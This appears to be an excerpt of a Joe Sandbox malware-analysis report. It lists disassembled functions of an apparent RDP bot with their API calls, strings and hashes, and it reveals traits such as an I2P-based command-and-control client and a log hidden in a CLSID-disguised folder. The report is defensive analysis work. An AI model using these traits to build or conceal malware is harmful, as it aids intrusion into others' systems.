Opcode Fuzzy Hash: c15513de3634a196f3366f7d1138319d101bf8746a27b5df0d8da0fc0013f9cf
Instruction Fuzzy Hash: F2515420F0E60F97FE209711A5B43B96250AF07F47F554932EB0E467A3DEAEA945C309

Function 00007FFDAC12794C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFDAC12796C
GetLastError.KERNEL32 ref: 00007FFDAC127AA0

Part of subcall function 00007FFDAC127400: GetModuleHandleExA.KERNEL32 ref: 00007FFDAC12741E

strlen.MSVCRT ref: 00007FFDAC1279BE
strlen.MSVCRT ref: 00007FFDAC1279DA
strcat.MSVCRT ref: 00007FFDAC1279F5
strlen.MSVCRT ref: 00007FFDAC1279FD
strlen.MSVCRT ref: 00007FFDAC127A12
fopen.MSVCRT ref: 00007FFDAC127A38

Strings

log, xrefs: 00007FFDAC127A27
Done, xrefs: 00007FFDAC127BDD
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDAC127A8A
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log, xrefs: 00007FFDAC12799E, 00007FFDAC1279B4, 00007FFDAC1279EB, 00007FFDAC127A08, 00007FFDAC127A57
, xrefs: 00007FFDAC127ABE
P, xrefs: 00007FFDAC127B2A
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFDAC127AB2
cnccli.l, xrefs: 00007FFDAC127A1A
[I] (%s) -> %s, xrefs: 00007FFDAC127BEB
~, xrefs: 00007FFDAC127B25
debug_init, xrefs: 00007FFDAC127A5E, 00007FFDAC127A83, 00007FFDAC127AAB, 00007FFDAC127B70, 00007FFDAC127BE4
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFDAC127B77
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFDAC127A65

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$cnccli.l$debug_init$log$~
API String ID: 3395718042-315528054
Opcode ID: 1ced88086860b0335c3687ddabaa48db9f03ae77cfe54b3e4f688aaffc654aeb
Instruction ID: 5d3fe4b074189ef14a0ce11669511879d17af9c549cc09791da4c1f4ff46e864
Opcode Fuzzy Hash: 1ced88086860b0335c3687ddabaa48db9f03ae77cfe54b3e4f688aaffc654aeb
Instruction Fuzzy Hash: 3C516297B1EA07C1FB53A751E4B03BA52D0AF447F8F544132C50E4A7A3DE6CEA45838A

Function 00007FFDA55A5192 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFDA55A51EC
RegQueryValueExA.ADVAPI32 ref: 00007FFDA55A5334

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

Strings

[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFDA55A562B
, xrefs: 00007FFDA55A536E
(value_sz != NULL), xrefs: 00007FFDA55A52F2
(value != NULL), xrefs: 00007FFDA55A52BF
NULL, xrefs: 00007FFDA55A538E, 00007FFDA55A563C, 00007FFDA55A5648
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFDA55A520E
P, xrefs: 00007FFDA55A53DF
(key != NULL), xrefs: 00007FFDA55A528C
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA55A54AD
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55A5267, 00007FFDA55A529A, 00007FFDA55A52CD, 00007FFDA55A5300
(root != NULL), xrefs: 00007FFDA55A5259
P, xrefs: 00007FFDA55A53E8
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFDA55A5252, 00007FFDA55A5285, 00007FFDA55A52B8, 00007FFDA55A52EB
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFDA55A5362
, xrefs: 00007FFDA55A5377
registry_get_value, xrefs: 00007FFDA55A5207, 00007FFDA55A5260, 00007FFDA55A5293, 00007FFDA55A52C6, 00007FFDA55A52F9, 00007FFDA55A535B, 00007FFDA55A54A6, 00007FFDA55A5624

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-3890537267
Opcode ID: d82b60a53b268ca6e58022ac538728e645c6a34c9821543705b62287da690c88
Instruction ID: e21eb52b581eace94bdcc4b0de8f8105e77d52683508d874447ae05a239df137
Opcode Fuzzy Hash: d82b60a53b268ca6e58022ac538728e645c6a34c9821543705b62287da690c88
Instruction Fuzzy Hash: A4A144A8B0E74F91FE229F10B468B7921506F17F45F540532DB1E067D3EE6EA989C309

Function 00007FFDA55D3382 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFDA55D33DC
RegQueryValueExA.ADVAPI32 ref: 00007FFDA55D3524

Part of subcall function 00007FFDA55D9DC2: fwrite.MSVCRT ref: 00007FFDA55D9E6E
Part of subcall function 00007FFDA55D9DC2: fflush.MSVCRT ref: 00007FFDA55D9E7A

Strings

P, xrefs: 00007FFDA55D35D8
NULL, xrefs: 00007FFDA55D357E, 00007FFDA55D382C, 00007FFDA55D3838
, xrefs: 00007FFDA55D3567
(root != NULL), xrefs: 00007FFDA55D3449
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFDA55D3552
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA55D369D
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFDA55D381B
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFDA55D3442, 00007FFDA55D3475, 00007FFDA55D34A8, 00007FFDA55D34DB
P, xrefs: 00007FFDA55D35CF
(value_sz != NULL), xrefs: 00007FFDA55D34E2
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55D3457, 00007FFDA55D348A, 00007FFDA55D34BD, 00007FFDA55D34F0
(value != NULL), xrefs: 00007FFDA55D34AF
registry_get_value, xrefs: 00007FFDA55D33F7, 00007FFDA55D3450, 00007FFDA55D3483, 00007FFDA55D34B6, 00007FFDA55D34E9, 00007FFDA55D354B, 00007FFDA55D3696, 00007FFDA55D3814
(key != NULL), xrefs: 00007FFDA55D347C
, xrefs: 00007FFDA55D355E
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFDA55D33FE

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-3890537267
Opcode ID: 31996340f94c35ffe3165162bd0582699337a34eaa5e5744c2d59dcda0e096b0
Instruction ID: 2ee2c3640e00bb924ffc57f3521de2b64559129b6513db0eb85d339a74249684
Opcode Fuzzy Hash: 31996340f94c35ffe3165162bd0582699337a34eaa5e5744c2d59dcda0e096b0
Instruction Fuzzy Hash: B2A13F6BB0E78FD5F662DF40F82037822506F06F84E564132C91E46797EE6EE985C30A

Function 00007FFDAC0FBA62 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFDAC0FBABC
RegQueryValueExA.ADVAPI32 ref: 00007FFDAC0FBC04

Part of subcall function 00007FFDAC0F1352: fwrite.MSVCRT ref: 00007FFDAC0F13FE
Part of subcall function 00007FFDAC0F1352: fflush.MSVCRT ref: 00007FFDAC0F140A

Strings

(key != NULL), xrefs: 00007FFDAC0FBB5C
(value_sz != NULL), xrefs: 00007FFDAC0FBBC2
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFDAC0FBEFB
registry_get_value, xrefs: 00007FFDAC0FBAD7, 00007FFDAC0FBB30, 00007FFDAC0FBB63, 00007FFDAC0FBB96, 00007FFDAC0FBBC9, 00007FFDAC0FBC2B, 00007FFDAC0FBD76, 00007FFDAC0FBEF4
P, xrefs: 00007FFDAC0FBCAF
, xrefs: 00007FFDAC0FBC47
P, xrefs: 00007FFDAC0FBCB8
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFDAC0FBC32
NULL, xrefs: 00007FFDAC0FBC5E, 00007FFDAC0FBF0C, 00007FFDAC0FBF18
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFDAC0FBADE
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFDAC0FBB22, 00007FFDAC0FBB55, 00007FFDAC0FBB88, 00007FFDAC0FBBBB
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDAC0FBD7D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDAC0FBB37, 00007FFDAC0FBB6A, 00007FFDAC0FBB9D, 00007FFDAC0FBBD0
(root != NULL), xrefs: 00007FFDAC0FBB29
, xrefs: 00007FFDAC0FBC3E
(value != NULL), xrefs: 00007FFDAC0FBB8F

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-3890537267
Opcode ID: 486f74fa75455f495f729b84cffc972dde884087864d78dae4b960ba9e6b1242
Instruction ID: 4f17942d84e6ca09f0af6b9341abed4f9c2ea959d974b7c8107d2148d12da439
Opcode Fuzzy Hash: 486f74fa75455f495f729b84cffc972dde884087864d78dae4b960ba9e6b1242
Instruction Fuzzy Hash: B5A14061B0F74B81FA21A700A9603792250AF007F4E540132DA9E06797FF6DE9D5EB9F

Function 00007FFDA5573402 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFDA557345C
RegQueryValueExA.ADVAPI32 ref: 00007FFDA55735A4

Part of subcall function 00007FFDA55740D2: fwrite.MSVCRT ref: 00007FFDA557417E
Part of subcall function 00007FFDA55740D2: fflush.MSVCRT ref: 00007FFDA557418A

Strings

P, xrefs: 00007FFDA5573658
(value_sz != NULL), xrefs: 00007FFDA5573562
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55734D7, 00007FFDA557350A, 00007FFDA557353D, 00007FFDA5573570
P, xrefs: 00007FFDA557364F
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFDA557389B
registry_get_value, xrefs: 00007FFDA5573477, 00007FFDA55734D0, 00007FFDA5573503, 00007FFDA5573536, 00007FFDA5573569, 00007FFDA55735CB, 00007FFDA5573716, 00007FFDA5573894
NULL, xrefs: 00007FFDA55735FE, 00007FFDA55738AC, 00007FFDA55738B8
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFDA55735D2
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFDA55734C2, 00007FFDA55734F5, 00007FFDA5573528, 00007FFDA557355B
, xrefs: 00007FFDA55735E7
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFDA557347E
(key != NULL), xrefs: 00007FFDA55734FC
(root != NULL), xrefs: 00007FFDA55734C9
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA557371D
, xrefs: 00007FFDA55735DE
(value != NULL), xrefs: 00007FFDA557352F

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-3890537267
Opcode ID: 2a0d627020711881d29985d82f55cff846ba4a5cf5951dcfe302d82779e29abf
Instruction ID: cda9f6f7f10334bdf8f5f3ea64656ac8bc524a2224b012f1478d63915717e924
Opcode Fuzzy Hash: 2a0d627020711881d29985d82f55cff846ba4a5cf5951dcfe302d82779e29abf
Instruction Fuzzy Hash: A0A14168B0E71F91FA229F10F4203792250AF02F64F550536C91E267A3EFADB945D70E

Function 00007FFDA5BA9AD2 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFDA5BA9B2C
RegQueryValueExA.ADVAPI32 ref: 00007FFDA5BA9C74

Part of subcall function 00007FFDA5BA2072: fwrite.MSVCRT ref: 00007FFDA5BA211E
Part of subcall function 00007FFDA5BA2072: fflush.MSVCRT ref: 00007FFDA5BA212A

Strings

(key != NULL), xrefs: 00007FFDA5BA9BCC
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFDA5BA9B92, 00007FFDA5BA9BC5, 00007FFDA5BA9BF8, 00007FFDA5BA9C2B
NULL, xrefs: 00007FFDA5BA9CCE, 00007FFDA5BA9F7C, 00007FFDA5BA9F88
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFDA5BA9CA2
(root != NULL), xrefs: 00007FFDA5BA9B99
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA5BA9BA7, 00007FFDA5BA9BDA, 00007FFDA5BA9C0D, 00007FFDA5BA9C40
, xrefs: 00007FFDA5BA9CB7
registry_get_value, xrefs: 00007FFDA5BA9B47, 00007FFDA5BA9BA0, 00007FFDA5BA9BD3, 00007FFDA5BA9C06, 00007FFDA5BA9C39, 00007FFDA5BA9C9B, 00007FFDA5BA9DE6, 00007FFDA5BA9F64
(value != NULL), xrefs: 00007FFDA5BA9BFF
P, xrefs: 00007FFDA5BA9D28
(value_sz != NULL), xrefs: 00007FFDA5BA9C32
, xrefs: 00007FFDA5BA9CAE
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDA5BA9DED
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFDA5BA9F6B
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFDA5BA9B4E
P, xrefs: 00007FFDA5BA9D1F

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-3890537267
Opcode ID: 4ccf6c6fafd6ef0edcb25c1f4905c0d0115fa185244a2163390da6380f031c66
Instruction ID: 36ff49223df7c6c65d8e1aa54218b693f0ff3d68caefddf83df0f3d736b6d4d9
Opcode Fuzzy Hash: 4ccf6c6fafd6ef0edcb25c1f4905c0d0115fa185244a2163390da6380f031c66
Instruction Fuzzy Hash: F2A178A0B0E74F9BFA609700E4613B962517F43F46F410432DB5E06793EEAFA985E309

Function 00007FFDAC12D3F2 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFDAC12D44C
RegQueryValueExA.ADVAPI32 ref: 00007FFDAC12D594

Part of subcall function 00007FFDAC1277A2: fwrite.MSVCRT ref: 00007FFDAC12784E
Part of subcall function 00007FFDAC1277A2: fflush.MSVCRT ref: 00007FFDAC12785A

Strings

(key != NULL), xrefs: 00007FFDAC12D4EC
, xrefs: 00007FFDAC12D5D7
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFDAC12D70D
(value_sz != NULL), xrefs: 00007FFDAC12D552
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFDAC12D4B2, 00007FFDAC12D4E5, 00007FFDAC12D518, 00007FFDAC12D54B
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFDAC12D88B
, xrefs: 00007FFDAC12D5CE
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFDAC12D5C2
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDAC12D4C7, 00007FFDAC12D4FA, 00007FFDAC12D52D, 00007FFDAC12D560
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFDAC12D46E
registry_get_value, xrefs: 00007FFDAC12D467, 00007FFDAC12D4C0, 00007FFDAC12D4F3, 00007FFDAC12D526, 00007FFDAC12D559, 00007FFDAC12D5BB, 00007FFDAC12D706, 00007FFDAC12D884
P, xrefs: 00007FFDAC12D648
NULL, xrefs: 00007FFDAC12D5EE, 00007FFDAC12D89C, 00007FFDAC12D8A8
P, xrefs: 00007FFDAC12D63F
(root != NULL), xrefs: 00007FFDAC12D4B9
(value != NULL), xrefs: 00007FFDAC12D51F

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-3890537267
Opcode ID: 347c12ae38df08f32de982b8086dd46448460d65b80159604ddd9383d8eeb33b
Instruction ID: 2fb6470819395498962482e76f1bfe82d4d7126c70f126a5c76b4862a5926867
Opcode Fuzzy Hash: 347c12ae38df08f32de982b8086dd46448460d65b80159604ddd9383d8eeb33b
Instruction Fuzzy Hash: 4FA1306BF0E74785F662BB00E4647B92250AF403E8F540432C95E0A7A7EE6DE985C74F

Function 00007FFDAC12C63D Relevance: 33.4, APIs: 2, Strings: 17, Instructions: 180threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FFDAC12C852
GetLastError.KERNEL32 ref: 00007FFDAC12C8B3

Strings

server_timeo, xrefs: 00007FFDAC12C6F3
cnccli, xrefs: 00007FFDAC12C67B, 00007FFDAC12C6B9, 00007FFDAC12C6FA, 00007FFDAC12C73B, 00007FFDAC12C77C, 00007FFDAC12C7AF
Done, xrefs: 00007FFDAC12C894
routine_rx, xrefs: 00007FFDAC12C864, 00007FFDAC12C8BE
P, xrefs: 00007FFDAC12C905
, xrefs: 00007FFDAC12C8D8
[I] (%s) -> CreateThread(%s) done, xrefs: 00007FFDAC12C872
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDAC12C80C
i2p_addr, xrefs: 00007FFDAC12C7A8
server_host, xrefs: 00007FFDAC12C674
i2p_sam3_timeo, xrefs: 00007FFDAC12C775
server_port, xrefs: 00007FFDAC12C6B2
~, xrefs: 00007FFDAC12C900
cnc_init, xrefs: 00007FFDAC12C805, 00007FFDAC12C86B, 00007FFDAC12C89B, 00007FFDAC12C8C5
[I] (%s) -> %s, xrefs: 00007FFDAC12C8A2
i2p_try_num, xrefs: 00007FFDAC12C734
[E] (%s) -> CreateThread(%s) failed(gle=%lu), xrefs: 00007FFDAC12C8CC

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: CreateErrorLastThread
String ID: $Done$P$[E] (%s) -> CreateThread(%s) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$cnc_init$cnccli$i2p_addr$i2p_sam3_timeo$i2p_try_num$routine_rx$server_host$server_port$server_timeo$~
API String ID: 1689873465-2891999747
Opcode ID: f76a8c05245f7f9d028f5976954a85eb74a90b3276b4e61e66dda8879a606635
Instruction ID: 6f0d5170e94f9d2eac34f351197d89eaf20436d92403d56d26d33e1531e85441
Opcode Fuzzy Hash: f76a8c05245f7f9d028f5976954a85eb74a90b3276b4e61e66dda8879a606635
Instruction Fuzzy Hash: AA910F6BB0FA4385FB629B14A8B47B52290AF543F8F500232C59D563E3DF6CE546C34A

